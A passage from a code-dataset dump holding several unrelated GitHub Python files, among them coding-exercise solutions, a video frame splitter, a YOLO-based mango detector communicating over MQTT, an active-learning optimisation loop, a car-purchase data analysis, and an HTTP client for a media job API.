= [int(x) for x in input().split()]\r\n m = min(valores)\r\n n = max(valores)\r\n\r\n if m <= 0:\r\n break\r\n\r\n soma = 0\r\n for i in range(m, n + 1):\r\n print(i, end=\" \")\r\n soma += i\r\n print(f\"Sum={soma}\")\r\n","repo_name":"GersonRS/beecrowd","sub_path":"Iniciante/python-solution/1101-sequencia-de-numeros-e-soma/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"19029776699","text":"# Задача №21. Решение в группах.\n# Напишите программу для печати всех уникальных значений в словаре.\n# Input: [{\"V\": \"S001\"}, {\"V\": \"S002\"}, {\"VI\": \"S001\"}, {\"VI\": \"S005\"},\n# {\"VII\": \" S005 \"}, {\" V \":\" S009 \"}, {\" VIII\":\" S007 \"}]\n# Output: {'S005', 'S002', 'S007', 'S001', 'S009'}\n# Примечание: Список словарей задан изначально, пользователь его не вводит.\n# ------------------------------------------------------\n\ndictionary = [{\"V\": \"S001\"}, {\"V\": \"S002\"}, {\"VI\": \"S001\"}, {\"VI\": \"S005\"},\n {\"VII\": \" S005 \"}, {\" V \": \" S009 \"}, {\" VIII\": \" S007 \"}]\ns = set()\n\nfor item in dictionary:\n for value in item.values():\n s.add(value.strip()) # Выводит неповторяющиеся значения словаря (С УДАЛЕНИЕМ пробелов).\n\nprint(*s)\n","repo_name":"kask1n/Py_Introduction","sub_path":"Py_Seminar3_Classwork/Py_Task21/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11089978086","text":"\"\"\"\n# Credits: https://github.com/msmccor100/Orchid-Pollinator-Detection\n\nThis script splits a video into frames at the specified frame rate, resizes these\nto specified dimensions, and saves these to the specified directory.\n\"\"\"\n\nimport os\nimport cv2\n\ndef split_video(vidpath, output_dir, desired_fps=4, width=640, height=640):\n vcdata = cv2.VideoCapture(vidpath)\n num_frames = vcdata.get(cv2.CAP_PROP_FRAME_COUNT)\n actual_fps = vcdata.get(cv2.CAP_PROP_FPS)\n if actual_fps == 0:\n return []\n\n # calculate duration of the video\n seconds = num_frames / actual_fps\n desired_frames = int(seconds * desired_fps)\n delta = num_frames / desired_frames\n\n (W, H) = (None, None)\n\n # Read in all the frames and store in an array\n frame_num = 0\n frame_array = [None] * desired_frames\n next_delta = 0\n count = 0\n while True:\n # read the next frame from the file\n (grabbed, frame) = vcdata.read()\n if not grabbed:\n break\n\n if W is None or H is None:\n (H, W) = frame.shape[:2]\n\n if frame_num >= next_delta:\n next_delta += delta\n if H != height or W != width:\n frame_array[count] = cv2.resize(frame, dsize=(width, height), interpolation=cv2.INTER_AREA)\n else:\n frame_array[count] = frame\n count += 1\n frame_num += 1\n\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n\n [_, vidname] = os.path.split(vidpath)\n [root_fn, _] = os.path.splitext(vidname)\n frames = []\n for count, frame in enumerate(frame_array):\n filename = root_fn + \"_\" + str(count) + \".jpg\"\n output_path = os.path.join(output_dir, filename)\n if frame is not None:\n cv2.imwrite(output_path, frame)\n frames.append(output_path)\n return frames\n","repo_name":"gsrinivas37/pollinator_detection","sub_path":"utils/split_video.py","file_name":"split_video.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23493785974","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport os\nimport platform\nimport shutil\nimport time\nfrom pathlib import Path\nimport cv2\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom numpy import random\nfrom models.experimental import attempt_load\nfrom utils.datasets import LoadStreams, LoadImages\nfrom utils.general import (\n check_img_size, non_max_suppression, apply_classifier, scale_coords,\n xyxy2xywh, plot_one_box, strip_optimizer, set_logging)\nfrom utils.torch_utils import select_device, load_classifier, time_synchronized\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport glob\nimport tensorflow as tf\nimport numpy as np\nfrom efficientnet import tfkeras as efn \nfrom array import array\nimport paho.mqtt.client as mqtt\nimport configparser\nimport datetime\nimport threading\nimport base64,io\nimport ast, re\nimport PIL.Image as Image\nimport paho.mqtt.publish as publish\n\n\nos.environ[\"KMP_DUPLICATE_LIB_OK\"]=\"TRUE\"\nos.chdir('/home/pi/yolov5')\n\n\ndef letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):\n # Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232\n shape = img.shape[:2] # current shape [height, width]\n if isinstance(new_shape, int):\n new_shape = (new_shape, new_shape)\n\n # Scale ratio (new / old)\n r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])\n if not scaleup: # only scale down, do not scale up (for better test mAP)\n r = min(r, 1.0)\n\n # Compute padding\n ratio = r, r # width, height ratios\n new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))\n dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding\n if auto: # minimum rectangle\n dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding\n elif scaleFill: # stretch\n dw, dh = 0.0, 0.0\n new_unpad = (new_shape[1], new_shape[0])\n ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios\n\n dw /= 2 # divide padding into 2 sides\n dh /= 2\n\n if shape[::-1] != new_unpad: # resize\n img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)\n top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))\n left, right = int(round(dw - 0.1)), int(round(dw + 0.1))\n img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border\n return img, ratio, (dw, dh)\n\ndef makeDict(Message):\n pattern = \"({.*})\"\n Message_String = str(Message)\n Message_Dict = ast.literal_eval(re.findall(pattern,Message_String)[0])\n return Message_Dict\n\ndef tobase64(img):\n return base64.b64encode(img).decode('ascii')\n\ndef readimage(path):\n count = os.stat(path).st_size / 2\n with open(path, \"rb\") as f:\n return f.read()\n\ndef imgArraytobase64(imgArray):\n pil_im = Image.fromarray(imgArray)\n b = io.BytesIO()\n pil_im.save(b, 'jpeg')\n im_bytes = b.getvalue()\n b64Img = tobase64(im_bytes)\n return b64Img\n\ndef on_connect(client, userdata, flags, rc):\n print(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\" Connected with result code \"+str(rc))\n client.subscribe(ToMQTTTopicSUB)\n \ndef on_disconnect(client, userdata, rc):\n client.reconnect()\n client.subscribe(ToMQTTTopicSUB)\n\ndef on_message(client, userdata, msg):\n print(\"message Received\")\n\n data_dict = makeDict(msg.payload)\n\n print(\"Image Received\")\n try:\n dec = data_dict['device']\n rep = data_dict['reply']\n nparr = np.frombuffer(base64.b64decode(data_dict['img']), np.uint8)\n img_np = cv2.imdecode(nparr, cv2.IMREAD_COLOR) # cv2.IMREAD_COLOR in OpenCV 3.1\n global abcmodel,efn_model,badmodel\n threading.Thread(target=dect_pic,args = (abcmodel,efn_model,badmodel,img_np,dec,rep,640)).start()\n except Exception as e:\n# pub_topic = {\"pi\":config['Mqtt']['pi'],\"line\":config['Mqtt']['line'],\"arm\":config['Mqtt']['arm']}\n publish.single(\"fromai/\", str({\"result\":\"ERROR!\",\"errorcode\":e}), hostname=ToMQTTTopicServerIP,port=ToMQTTTopicServerPort) #傳輸MQTT訊息 單次傳輸方便用\n\n\n\n\ndef letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):\n # Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232\n shape = img.shape[:2] # current shape [height, width]\n if isinstance(new_shape, int):\n new_shape = (new_shape, new_shape)\n\n # Scale ratio (new / old)\n r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])\n if not scaleup: # only scale down, do not scale up (for better test mAP)\n r = min(r, 1.0)\n\n # Compute padding\n ratio = r, r # width, height ratios\n new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))\n dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding\n if auto: # minimum rectangle\n dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding\n elif scaleFill: # stretch\n dw, dh = 0.0, 0.0\n new_unpad = (new_shape[1], new_shape[0])\n ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios\n\n dw /= 2 # divide padding into 2 sides\n dh /= 2\n\n if shape[::-1] != new_unpad: # resize\n img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)\n top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))\n left, right = int(round(dw - 0.1)), int(round(dw + 0.1))\n img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border\n return img, ratio, (dw, dh)\n\n\ndef load_Yolo_model(weights = './last.pt'):\n device = select_device('cpu')\n model = attempt_load(weights, map_location=device)\n imgsz = check_img_size(640, s=model.stride.max())\n half = device.type != 'cpu'\n if half:\n model.half()\n # names = model.module.names if hasattr(model, 'module') else model.names\n # colors = [[random.randint(0, 255) for _ in range(3)] for _ in range(len(names))]\n return model\n\ndef load_CNN_model(weights = './efnB7.hdf5'):\n model = tf.keras.models.load_model(weights)\n return model\n\ndef dect_pic(model,efn_model,badmodel,im0s,dec,reply,imgsz=640):\n write_bbox_to_img = True\n\n device = select_device('cpu')\n half = device.type != 'cpu'\n names = model.module.names if hasattr(model, 'module') else model.names\n colors = [[random.randint(0, 255) for _ in range(3)] for _ in range(len(names))]\n # out = './output'\n# im0s = cv2.imread(img_path)\n img = letterbox(im0s, new_shape=imgsz)[0]\n # Convert\n img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416\n img = np.ascontiguousarray(img)\n\n # for path, img, im0s, vid_cap in dataset:\n img = torch.from_numpy(img).to(device)\n img = img.half() if half else img.float() # uint8 to fp16/32\n img /= 255.0 # 0 - 255 to 0.0 - 1.0\n if img.ndimension() == 3:\n img = img.unsqueeze(0)\n\n # Inference\n pred = model(img, augment='')[0]\n\n # Apply NMS .4:conf .5:iou\n pred = non_max_suppression(pred, 0.4, 0.5, classes='', agnostic='')\n # print(pred)\n\n # Process detections\n detect_list = []\n result_list = []\n for i, det in enumerate(pred): # detections per image\n s, im0 = '', im0s\n \n if det is not None and len(det):\n # Rescale boxes from img_size to im0 size\n det[:, :4] = scale_coords(img.shape[2:], det[:, :4], im0.shape).round()\n\n # Write results\n for *xyxy, conf, cls in reversed(det):\n c1, c2 = (int(xyxy[0]), int(xyxy[1])), (int(xyxy[2]), int(xyxy[3]))\n de = []\n for i in xyxy:\n print(i/10)\n de.append(int(i/10))\n\n if(detect_list == []):\n crop_img = im0[c1[1]:c2[1], c1[0]:c2[0]] #crop_img's ndarray\n im = Image.fromarray(crop_img).resize((600,600)) #read from array and resize resize((size,size)) size:efn_model's \n test = np.array(im).reshape(1,600,600,3)/255\n pre = efn_model.predict(test)\n\n pred=np.argmax(pre,axis=1)[0]\n use_badmango_yolo = True\n if use_badmango_yolo:\n # print(crop_img.shape)\n im = Image.fromarray(crop_img).resize((1280,720))\n bad_im0 = dect_badpic(badmodel,np.array(im),640)\n print(bad_im0.shape)\n new_im = Image.fromarray(bad_im0).resize((crop_img.shape[1],crop_img.shape[0]))\n im0[c1[1]:c2[1], c1[0]:c2[0]] = new_im\n if write_bbox_to_img: # Add bbox to image\n result_list.append(names[int(pred)])\n label = '%s %.2f' % (names[int(pred)], pre[0][int(pred)]) #e.g A 0.59\n yoloLab = '%s %.2f' % (names[int(cls)], conf) #e.g A 0.50\n print(\"CNN\",label)\n print(\"yolo\",yoloLab)\n plot_one_box(xyxy, im0, label=label, color=colors[int(cls)], line_thickness=3)\n # cv2.imwrite('./crop_dect.jpg', crop_img)\n else:\n for i in detect_list:\n if(i == de):\n continue\n else:\n crop_img = im0[c1[1]:c2[1], c1[0]:c2[0]] #crop_img's ndarray\n im = Image.fromarray(crop_img).resize((600,600)) #read from array and resize resize((size,size)) size:efn_model's \n test = np.array(im).reshape(1,600,600,3)/255\n pre = efn_model.predict(test)\n\n pred=np.argmax(pre,axis=1)[0]\n use_badmango_yolo = True\n if use_badmango_yolo:\n # print(crop_img.shape)\n im = Image.fromarray(crop_img).resize((1280,720))\n bad_im0 = dect_badpic(badmodel,np.array(im),640)\n print(bad_im0.shape)\n new_im = Image.fromarray(bad_im0).resize((crop_img.shape[1],crop_img.shape[0]))\n im0[c1[1]:c2[1], c1[0]:c2[0]] = new_im\n if write_bbox_to_img: # Add bbox to image\n result_list.append(names[int(pred)])\n label = '%s %.2f' % (names[int(pred)], pre[0][int(pred)]) #e.g A 0.59\n yoloLab = '%s %.2f' % (names[int(cls)], conf) #e.g A 0.50\n print(\"CNN\",label)\n print(\"yolo\",yoloLab)\n plot_one_box(xyxy, im0, label=label, color=colors[int(cls)], line_thickness=3)\n\n b64Img = imgArraytobase64(im0[:,:,::-1]) #convert imgarray to btye then to base64\n cv2.imwrite('./test_dect22.jpg', im0)\n data_dict = {\"result\":result_list,\"img\": b64Img,\"reply\":reply,\"device\":dec}\n config = configparser.ConfigParser()\n config.read(\"./config.ini\")\n ToMQTTTopicServerIP = config['Mqtt']['MQTTTopicServerIP']\n ToMQTTTopicServerPort = int(config['Mqtt']['port'])\n pub_topic = {\"pi\":config['Mqtt']['pi'],\"line\":config['Mqtt']['line'],\"arm\":config['Mqtt']['arm']}\n publish.single(pub_topic[dec], str(data_dict), hostname=ToMQTTTopicServerIP,port=ToMQTTTopicServerPort) #傳輸MQTT訊息 單次傳輸方便用\n \n\ndef dect_badpic(model,im0s,imgsz=640):\n write_bbox_to_img = True\n device = select_device('cpu')\n half = device.type != 'cpu'\n names = model.module.names if hasattr(model, 'module') else model.names\n colors = [[random.randint(0, 255) for _ in range(3)] for _ in range(len(names))]\n # out = './output'\n# print(np.array(im0s)[:,:,::-1])\n# print(im0s.shape)\n# im0s = cv2.imread('./badmango.jpg')\n# print(im0s)\n# print(im0s.shape)\n img = letterbox(im0s, new_shape=imgsz)[0]\n # Convert\n img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416\n img = np.ascontiguousarray(img)\n\n # for path, img, im0s, vid_cap in dataset:\n img = torch.from_numpy(img).to(device)\n img = img.half() if half else img.float() # uint8 to fp16/32\n img /= 255.0 # 0 - 255 to 0.0 - 1.0\n if img.ndimension() == 3:\n img = img.unsqueeze(0)\n\n # Inference\n pred = model(img, augment='')[0]\n\n # Apply NMS .4:conf .5:iou\n pred = non_max_suppression(pred, 0.4, 0.5, classes='', agnostic='')\n # print(pred)\n\n # Process detections\n for i, det in enumerate(pred): # detections per image\n s, im0 = '', im0s\n if det is not None and len(det):\n # Rescale boxes from img_size to im0 size\n det[:, :4] = scale_coords(img.shape[2:], det[:, :4], im0.shape).round()\n\n # Write results\n for *xyxy, conf, cls in reversed(det):\n c1, c2 = (int(xyxy[0]), int(xyxy[1])), (int(xyxy[2]), int(xyxy[3]))\n if write_bbox_to_img: # Add bbox to image\n yoloLab = '%s %.2f' % (names[int(cls)], conf) #e.g A 0.50\n print(\"yolo\",yoloLab)\n plot_one_box(xyxy, im0, label=yoloLab, color=colors[int(cls)], line_thickness=3)\n return im0\n\n\n#讀取設定檔案\nconfig = configparser.ConfigParser()\nconfig.read(\"./config.ini\")\n_g_cst_ToMQTTTopicServerIP = config['Mqtt']['MQTTTopicServerIP']\n_g_cst_ToMQTTTopicServerPort = int(config['Mqtt']['port'])\n_yolo_mango_weight_path = config['Weights']['yolo_abc']\n_yolo_badMango_weight_path = config['Weights']['yolo_bad']\n_CNN_weight_path = config['Weights']['cnn']\nToMQTTTopicSUB = config['Mqtt']['sub']\n#預讀模型\nabcmodel = load_Yolo_model(_yolo_mango_weight_path) \nbadmodel = load_Yolo_model(_yolo_badMango_weight_path)\nefn_model = load_CNN_model(_CNN_weight_path)\n\n#建立MQTT連線\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.on_disconnect = on_disconnect\nclient.connect(_g_cst_ToMQTTTopicServerIP, _g_cst_ToMQTTTopicServerPort,60)\nclient.loop_forever()\n\n","repo_name":"JackHsuan/Yolov5_selftutorial","sub_path":"detect_withMqtt.py","file_name":"detect_withMqtt.py","file_ext":"py","file_size_in_byte":14303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13363819025","text":"from activestructopt.optimization.rmc.rmc import rmc_ucb\nfrom activestructopt.gnn.ensemble import Ensemble\nfrom activestructopt.dataset.dataset import make_data_splits, update_datasets\nimport numpy as np\n\ndef active_learning(\n optfunc, \n args, \n target,\n config, \n initial_structure, \n max_forward_calls = 100,\n rmc_iterations = 10000,\n N = 30, \n k = 5, \n perturbrmin = 0.0, \n perturbrmax = 1.0, \n split = 1/3, \n device = 'cuda',\n rmcσ = 0.0025,\n σr = 0.1,\n λ = 1.0,\n print_mses = True,\n ):\n structures, ys, datasets, kfolds, test_indices, test_data, test_targets = make_data_splits(\n initial_structure,\n optfunc,\n args,\n config['dataset'],\n N = N,\n k = k,\n perturbrmin = perturbrmin,\n perturbrmax = perturbrmax,\n split = split,\n device = device,\n )\n mses = [np.mean((y - target) ** 2) for y in ys]\n if print_mses:\n print(mses)\n for i in range(max_forward_calls - N):\n starting_structure = structures[np.argmin(mses)].copy()\n ensemble = Ensemble(k, config, datasets)\n ensemble.train()\n ensemble.set_scalar_calibration(test_data, test_targets)\n new_structure = rmc_ucb(\n ensemble.predict,\n {},\n target,\n rmcσ,\n starting_structure,\n rmc_iterations,\n σr = σr,\n λ = λ,\n )\n structures.append(new_structure)\n datasets, y = update_datasets(\n datasets,\n new_structure,\n config['dataset'],\n optfunc,\n args,\n device,\n )\n ys.append(y)\n new_mse = np.mean((y - target) ** 2)\n mses.append(new_mse)\n if print_mses:\n print(new_mse)\n return structures, ys, mses, (\n datasets, kfolds, test_indices, test_data, test_targets, ensemble)\n","repo_name":"Fung-Lab/ActiveStructOpt","sub_path":"activestructopt/active/active.py","file_name":"active.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73926912145","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport seaborn as sns\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.metrics import accuracy_score, mean_squared_error\r\nimport re\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\n\r\ndata=pd.read_csv(\"car_purchasing1.csv\")\r\n\r\n \r\ndef preprocessing(data):\r\n data['age'].fillna(data['age'].mean(), inplace=True)\r\n data['annual Salary'].fillna(data['annual Salary'].mean(),inplace=True)\r\n data['credit card debt'].fillna(data['credit card debt'].mean(),inplace=True)\r\n data['net worth'].fillna(data['net worth'].mean(),inplace=True)\r\n data['car purchase amount'].fillna(data['car purchase amount'].mean(),inplace=True)\r\n\r\ndef gender_bar(data):\r\n gender_counts = data['gender'].value_counts()\r\n gender_counts.plot(kind='bar', rot=0, color=['skyblue', 'lightcoral'])\r\n plt.title('Gender Distribution')\r\n plt.xlabel('Gender')\r\n plt.ylabel('Count')\r\n plt.show()\r\n\r\ndef age_hist(data):\r\n data['age'].plot(kind='hist', bins=20, color='orange', edgecolor='black')\r\n plt.title('Age Distribution')\r\n plt.xlabel('Age')\r\n plt.ylabel('Frequency')\r\n plt.show()\r\n\r\ndef scatter_income(data):\r\n plt.scatter(data['annual Salary'], data['net worth'], color='green')\r\n plt.title('Net Worth vs. Annual Salary')\r\n plt.xlabel('Annual Salary')\r\n plt.ylabel('Net Worth')\r\n plt.show()\r\n\r\ndef car_by_country(data):\r\n plt.figure(figsize=(12, 6))\r\n sns.boxplot(x='country', y='car purchase amount', data=data, palette='viridis')\r\n plt.title('Car Purchase Amount by Country')\r\n plt.xlabel('Country')\r\n plt.ylabel('Car Purchase Amount')\r\n plt.xticks(rotation=45)\r\n plt.show()\r\n\r\ndef gender_pie(data):\r\n lable={0:\"Female\",1:\"Male\"}\r\n gender_proportion = data['gender'].map(lable).value_counts()\r\n plt.pie(gender_proportion, labels=gender_proportion.index, autopct='%1.1f%%', colors=['skyblue','lightcoral'])\r\n plt.title('Gender Proportion')\r\n plt.show()\r\n\r\ndef extract_code_from_emails(df):\r\n\r\n def extract_code(email):\r\n match = re.search(r'\\.([a-zA-Z]{2,3})$', email)\r\n return match.group(1) if match else None\r\n\r\n # Apply the function to the specified column and create a new column 'country_code'\r\n df['email_code'] = df['customer e-mail'].apply(extract_code)\r\n\r\n return df\r\n\r\ndef add_columns_for_info(data):\r\n data['fiancial_stability_ratio']=data['annual Salary']/(data['credit card debt']+data['net worth'])\r\n data['networth_age_ratio']=data['net worth']/data['age']\r\n\r\n salary_weight = 0.6\r\n debt_weight = 0.2\r\n net_worth_weight = 0.2\r\n\r\n# Calculate Financial Stability Index\r\n data['financial_stability_index'] = (salary_weight * data['annual Salary'] +\r\n debt_weight * data['credit card debt'] -\r\n net_worth_weight * data['net worth'])\r\n scaler = MinMaxScaler()\r\n data[['networth_age_ratio','fiancial_stability_ratio','financial_stability_index']] = scaler.fit_transform(data[['networth_age_ratio', 'fiancial_stability_ratio', 'financial_stability_index']])\r\n\r\ndef scatter_age(data):\r\n plt.scatter(data['age'], data['net worth'], color='blue',s=50,marker=\"X\")\r\n plt.title('Net Worth vs. Age')\r\n plt.xlabel('Age')\r\n plt.ylabel('Net Worth')\r\n plt.show()\r\n\r\ndef prepare_data(data):\r\n # One-hot encode categorical variables\r\n data_encoded = pd.get_dummies(data, columns=['country', 'gender'], drop_first=True)\r\n \r\n X = data_encoded[['age', 'annual Salary', 'credit card debt', 'net worth']]\r\n Y = data_encoded['car purchase amount']\r\n return X, Y\r\n\r\ndef train_and_evaluate_model(X, Y):\r\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=2)\r\n \"\"\"Train a linear regression model and evaluate its accuracy on training and testing data.\"\"\"\r\n model = LinearRegression()\r\n model.fit(X_train, Y_train)\r\n\r\n Y_train_predictions = model.predict(X_train)\r\n training_mse = mean_squared_error(Y_train, Y_train_predictions)\r\n print(\"Mean Squared Error on training data:\", training_mse)\r\n\r\n Y_test_predictions = model.predict(X_test)\r\n testing_mse = mean_squared_error(Y_test, Y_test_predictions)\r\n print(\"Mean Squared Error on testing data:\", testing_mse)\r\n\r\n\r\npreprocessing(data)\r\nscatter_age(data)\r\ngender_bar(data)\r\ngender_pie(data)\r\nage_hist(data)\r\nscatter_age(data)\r\nscatter_income(data)\r\ncar_by_country(data)\r\nadd_columns_for_info(data)\r\ndf=extract_code_from_emails(data)\r\nprint(df)\r\nX,Y=prepare_data(data)\r\ntrain_and_evaluate_model(X,Y)","repo_name":"ShlokArora2709/CODSOFT","sub_path":"sales_prediction/sales_pred.py","file_name":"sales_pred.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3610979089","text":"# -----------\n# User Instructions:\n#\n# Modify the function search so that it returns\n# a table of values called expand. This table\n# will keep track of which step each node was\n# expanded.\n#\n# Make sure that the initial cell in the grid\n# you return has the value 0.\n# ----------\nfrom pprint import pprint\n\ngrid = [[0, 1, 1, 1, 1],\n [0, 1, 0, 0, 0],\n [0, 0, 0, 1, 0],\n [1, 1, 1, 1, 0],\n [0, 0, 0, 1, 0]]\ninit = [0, 0]\ngoal = [len(grid) - 1, len(grid[0]) - 1]\ncost = 1\n\ndelta = [[-1, 0], # go up\n [0, -1], # go left\n [1, 0], # go down\n [0, 1]] # go right\n\ndelta_name = ['^', '<', 'v', '>']\n\n\ndef search(grid, init, goal, cost):\n # ----------------------------------------\n # modify code below\n # ----------------------------------------\n expand = [[-1 for _ in range(len(grid[0]))] for _ in range(len(grid))]\n\n index = 0\n searched = {tuple(init): None}\n open = {(0, init[0], init[1]), }\n\n while len(open) > 0:\n cell = min(open, key=lambda x: x[0])\n open.remove(cell)\n g, x, y = cell\n expand[x][y] = index\n index += 1\n\n for (d_x, d_y) in delta:\n x_n = x + d_x\n y_n = y + d_y\n\n if (x_n, y_n) not in searched and 0 <= x_n < len(grid) and 0 <= y_n < len(grid[0]) and grid[x_n][\n y_n] == 0:\n path = (g + cost, x_n, y_n)\n open.add(path)\n searched[(x_n, y_n)] = (x, y)\n\n if x_n == goal[0] and y_n == goal[1]:\n expand[x_n][y_n] = index\n return expand\n\n return expand\n\n\npath = search(grid, init, goal, cost)\n\npprint(path)\n","repo_name":"Marius-Juston/Advanced-Autonomous-Vehicule","sub_path":"Python/search/expansion_grid.py","file_name":"expansion_grid.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"4133842458","text":"import httplib2\nimport urlparse\nimport json\nimport socket\n\n\nclass imenError(Exception):\n def __init__(self, value, critical=False):\n self.value = value\n self.critical = critical\n\n def __str__(self):\n return str(self.value)\n\n def __repr__(self):\n return self.value\n\n\nclass imenServer(object):\n def __init__(self, server='', port=''):\n self.server = server\n self.baseuri = 'http://%s:%s' % (self.server, port)\n self.baseapi = '/imen/api'\n\n\n def get(self, url):\n method = 'GET'\n body = ''\n\n if url is not None:\n uri = urlparse.urlparse(self.baseuri + self.baseapi + url)\n else:\n raise imenError('get(): url can not be None')\n\n h = httplib2.Http()\n\n try:\n response, content = h.request(uri.geturl(), method, body)\n except socket.error as err:\n raise imenError(err)\n\n if response['status'] == '200':\n return content\n elif response['status'] == '404':\n return None\n\n\n def post(self, url, body):\n method = 'POST'\n header = {'Content-type': 'application/json'}\n\n h = httplib2.Http()\n\n if url is not None:\n uri = urlparse.urlparse(self.baseuri + self.baseapi + url)\n else:\n raise imenError('post(): url can not be None')\n\n try:\n response, content = h.request(uri.geturl(), method, json.dumps(body), header)\n except socket.error as err:\n raise imenError(err)\n\n if response['status'] == '201':\n return content\n\n if response['status'] == '404':\n jsonData = json.loads(content)\n raise imenError(jsonData['message'])\n\n\nclass imenJob(object):\n def __init__(self, server, jobId = None):\n self.id = jobId\n self.server = server\n\n if self.id is not None:\n self.__load()\n else:\n self.thumb_preset = None\n self.input_filename = None\n self.input_path \t= None\n self.basename = None\n self.output_path = None\n self.priority = 9\n self.__status = None\n self.__progress = None\n self.__message = None\n\n def __load(self):\n data = self.server.get('/job/%s' % str(self.id))\n jsonData = json.loads(data)\n self.thumb_preset = jsonData['job']['thumb_preset']\n self.input_filename = jsonData['job']['input_filename']\n self.input_path = jsonData['job']['input_path']\n self.basename = jsonData['job']['basename']\n self.output_path = jsonData['job']['output_path']\n self.priority = jsonData['job']['priority']\n self.__status = jsonData['job']['status']\n self.__progress = jsonData['job']['progress']\n self.__message = jsonData['job']['message']\n\n def status(self):\n if self.id is not None:\n self.__load()\n return self.__status\n\n def message(self):\n if self.id is not None:\n self.__load()\n return self.__message\n\n def progress(self):\n if self.id is not None:\n self.__load()\n return self.__progress\n\n def start(self):\n if self.id is None:\n if self.server is None:\n raise imenError('Server can not be None')\n if self.input_filename is None:\n raise imenError('input_filename can not be None')\n if self.input_path is None:\n raise imenError('input_path can not be None')\n if self.basename is None:\n raise imenError('basename not be None')\n if self.output_path is None:\n raise imenError('output_path can not be None')\n if self.thumb_preset is None:\n raise imenError('thumb preset can not be None')\n job = {'job':\n {\n 'thumb_preset': self.thumb_preset,\n 'input_filename': self.input_filename,\n 'input_path': self.input_path,\n 'basename': self.basename,\n 'output_path': self.output_path,\n 'priority': self.priority\n }\n }\n\n response = self.server.post('/job/', job)\n responseJson = json.loads(response)\n self.id = responseJson['job']['id']\n self.__load()\n return self.id\n else:\n raise imenError('Job have an id: %s. Imposible start a Job with ID' % str(self.id))","repo_name":"emilianobilli/tarecho","sub_path":"imen_api.py","file_name":"imen_api.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12590000024","text":"\r\nimport random\r\nfrom draw2d import \\\r\n start_drawing, draw_line, draw_oval, draw_arc, \\\r\n draw_rectangle, draw_polygon, draw_text, finish_drawing\r\n\r\n\r\ndef main():\r\n # Width and height of the scene in pixels\r\n scene_width = 800\r\n scene_height = 500 \r\n\r\n canvas = start_drawing(\"Scene\", scene_width, scene_height)\r\n \r\n half_height = round(scene_height / 2)\r\n min_diam = 200\r\n max_diam = 600\r\n for i in range(100):\r\n x = random.randint(0, scene_width - max_diam)\r\n y = random.randint(0, half_height)\r\n diameter = random.randint(min_diam, max_diam)\r\n draw_oval(canvas, x, y. x + diameter, y + diameter, fill=\"lightgray\")\r\n\r\n\r\ndef draw_sky(canvas):\r\n draw_rectangle(canvas, 0, 150, 800, 500, outline=\"\", fill=\"skyblue\")\r\n\r\ndef draw_sun(canvas):\r\n draw_oval(canvas, 350, 400, 450, 500, outline=\"\", fill=\"yellow\")\r\n\r\ndef draw_ground(canvas):\r\n draw_rectangle(canvas, 0, 0, 800, 150, outline=\"\", fill=\"green\")\r\n\r\nmain()","repo_name":"karennteran/programming-with-functions","sub_path":"prove milestone 3/random_radient.py","file_name":"random_radient.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14102420249","text":"__author__ = \"Frank Shen\"\n\n\nclass Array(object):\n def __init__(self, size=32, init=None):\n 